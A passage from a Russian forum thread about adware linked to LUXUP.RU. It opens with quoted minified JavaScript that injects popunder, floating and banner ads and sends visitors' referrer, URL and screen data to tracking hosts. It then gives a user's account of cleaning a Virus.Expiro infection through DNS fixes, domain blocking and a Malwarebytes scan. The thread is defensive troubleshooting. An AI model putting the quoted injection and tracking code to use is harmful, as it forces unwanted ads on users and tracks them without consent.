if(!g(f[h].multishowsAdd))f[h].multishowsAdd="";f[b].demogr=function(a){t.sex=encodeURIComponent(a.gen);t.lage=encodeURIComponent(a.lage);t.uage=encodeURIComponent(a.uage);t.demogr=j;sa()};f[b].interests=function(a){t.interest=encodeURIComponent(a.hier_inter.join(","));t.interests=j;sa()};f[h].parser=function(a){E=[];for(var b in a)if(a.hasOwnProperty(b)){var c=a[b];if("cfg"==c.type)c.hasOwnProperty("realShowsUrl")&&(ca=c.realShowsUrl),c.hasOwnProperty("getLiData")&&setTimeout(function(){H("http://medianet.yadro.ru/hier_inter.txt",
A());H("http://medianet.yadro.ru/info.txt",A())},0);else if("counters"==c.type){if(c.hasOwnProperty("urls"))for(var d=0;d<c.urls.length;d++)(new Image).src=c.urls[d]}else if(g(i["_"+c.id])&&g(c.source)&&c.source){if((d=n.getElementById(i["_"+c.id].id))&&"html"==c.type)if(P||(O(c.style),n.addEventListener?d.addEventListener("click",Q,z):d.attachEvent("onclick",Q)),d.innerHTML=c.source,i["_"+c.id].f=j,getElementsByClass("lx__tsbc",d).length&&E.push(d),g(i["_"+c.id].A)&&i["_"+c.id].A)for(var m=d.getElementsByTagName("img"),
s=m.length,t=0;t<s;t++)n.addEventListener?m[t].addEventListener("mouseover",function(){Ba(this)},z):m[t].attachEvent("onmouseover",Aa);if(d&&"pu"==c.type&&!Pa)M="http://c."+S+"/pu/"+c.id+".html",n.addEventListener?u.addEventListener("click",G[h].g,j):(u.attachEvent("onclick",G[h].g),u.setCapture(j)),Pa=i["_"+c.id].f=j;if(d&&"js"==c.type)P||(g(c.style)&&O(c.style),n.addEventListener?d.addEventListener("click",Q,z):d.attachEvent("onclick",Q)),Ra(d,c.source),i["_"+c.id].f=j;if(d&&"flash"==c.type&&!Na)K=
d,O(c.style),f[h].closed=function(){K.parentNode.removeChild(K)},f[h].clicked=function(){K.parentNode.removeChild(K)},d.innerHTML=c.source,i["_"+c.id].f=j,w&&(f.attachEvent("onscroll",ua),f.attachEvent("onresize",ua),va()),Na=j,getElementsByClass("lx__tsbc",d).length&&E.push(d);if(d&&c.type==v)o=d,(V||ma)&&Oa&&g(i["_"+c.id].z)&&i["_"+c.id].z&&Va(),""!=c.style&&O(c.style),w?o.e=e(o.currentStyle[v]):(o.e=e(n.defaultView.getComputedStyle(o,l).bottom),V&&(o.e-=1)),f[b].bottomClosed=function(){var a=n.createElement("a");
a.innerHTML=".";a.href="medianet.adlabs.ru";o.appendChild(a);a.focus();a.blur();o.style.display="none";da()},x("position",L),x(v,U),x("top","-100000px"),x("zIndex",99999),f[b].bottomReady=function(a,b){a=e(a);if(150<a)return z;o.childNodes[1].height=a+q;x(v,"-"+(a+5+10)+q);x("top","");w?x("position",L):x("position","fixed");if(w){if(0!=b)xa(),clearInterval(na),f[b].bottomReady=A()}else f[b].bottomReady=A();na=setInterval(function(){var a=w&&g(o.d)?o.d:e(o.style[v]);if(a<o.e&&!(6.25>o.e-a)){if(x(v,
a+5+q),w)o.d=a+5,x(v,U),T()}else{clearInterval(na);x(v,o.e+q);if(w)o.d=o.e,x(v,U),T(),f.attachEvent("onscroll",wa),f.attachEvent("onresize",wa);setTimeout(Ua,100)}},25)},o.innerHTML=c.source,ba||setTimeout(function(){var a=0,a=w?o.offsetHeight:n.defaultView.getComputedStyle(o,l).height;f[b].bottomReady(e(a)-5,1)},250),i["_"+c.id].f=j;if(d&&"float"==c.type){m=z;P||(O(c.style),D(d,ja,Q));if(!g(r[k])){var k=c.id;r[k]=i["_"+k];r[k].B=k;r[k].a=d;r[k].k=z;r[k].s=z;r[k].h=z;r[k].i=0;r[k].j=z;m=j}r[k].a.innerHTML=
c.source;r[k].a.style[r[k].b]=-1E3+q;r[k].a.style.display="block";r[k].width=e(r[k].a.width?r[k].a.width:r[k].a.offsetWidth);r[k].a.style[r[k].b]=-r[k].width+q;Ya(r[k],m);if(r[k].j)r[k].j=z;Fa(r[k])();i["_"+c.id].f=j;getElementsByClass("retail__tsbc",d).length&&E.push(d)}}}for(var y in i)i.hasOwnProperty(y)&&!g(i[y].f)&&g(i[y].r)&&i[y].r();P=z;setTimeout(function(){f[h].allLoaded()},0);da()};(function(){for(var a in i)if(i.hasOwnProperty(a)&&"object"==typeof i[a]){var b=n.getElementById(i[a].id),
c=z;g(i[a].type)&&"float"==i[a].type&&-1!=n.cookie.indexOf("_lxretpopupignore=1")&&(c=j);if(!b||c)delete i[a];else if((V||ma)&&g(i[a].type)&&"bottom"==i[a].type)if(ya().m){if(Oa=j,!g(i[a].o)||g(i[a].o)&&!i[a].o)F+=1}else F+=1;else F+=1}})();(new Image).src="http://counter.yadro.ru/hit;Luxup?r"+escape(n.referrer)+("undefined"==typeof screen?"":";s"+screen.width+"*"+screen.height+"*"+(screen.colorDepth?screen.colorDepth:screen.pixelDepth))+";u"+escape(n.URL)+";"+Math.random();(new Image).src="http://"+S+"/merge_gpsid/?t="+(new Date).getTime();za(0)})();

Отсутствует

 

№3626-12-2012 13:07:06

fyntig
Участник
 
Группа: Members
Зарегистрирован: 26-12-2012
Сообщений: 1
UA: Firefox 3.0

Re: Вредоносное рекламное ПО с сайта LUXUP.RU

У меня было это в сети. Гугл вывел на ваш форум, но приведённые советы не помогли, поэтому напишу тут свой случай (вдруг ещё кого гугл сюда с этим занесёт). Вся сеть начала получать это безобразие. Сразу полез искать на шлюзе (использую Kerio). Там днс всё чисто, но даже с него ходит на эти сайты. Первое что сделал: запретил доступ на mc.yandex.ru - некоторые сайты (например rmsauto.ru) начали тормозить из-за того что при каждом действии пытался выполниться скрипт, но большинство начало работать нормально. Причём шлюз тоже начал ходить нормально на сайты, хотя на него acl не распространяются и поидее он единственный должен был остаться глючным. Сделал вывод, что скрипт работает в связке 1 комп в сети + шлюз. У нас всего несколько компов имеют право менять вручную себе настройки подключения (на всякие чп оставлено) поэтому нашёл быстро и поправил в нём запасной днс (как говорилось тут на форуме). Потом скачал бесплатную программу Malwarebytes Anti-Malware (отсюда: malwarebytes.org), запустил полное сканирование и нашлось C:\WINDOWS\system32\inetsrv\iissync.exe (Virus.Expiro) -> Помещено в карантин и успешно удалено. Только после этого на шлюзе всё стало работать как надо и можно было отменять запрет на mc.yandex.ru. Как попало на комп точно не признались, но моё подозрение что пытались скачать .jpg файл, который на самом деле являлся .js. Почему антивирь (Нод5) разрешил - тоже не понятно, на шлюзе он, кстати, тот файл тоже вирусом не считал.

Отсутствует

 

Board footer

Powered by PunBB
Modified by Mozilla Russia
Copyright © 2004–2020 Mozilla Russia GitHub mark
Язык отображения форума: [Русский] [English]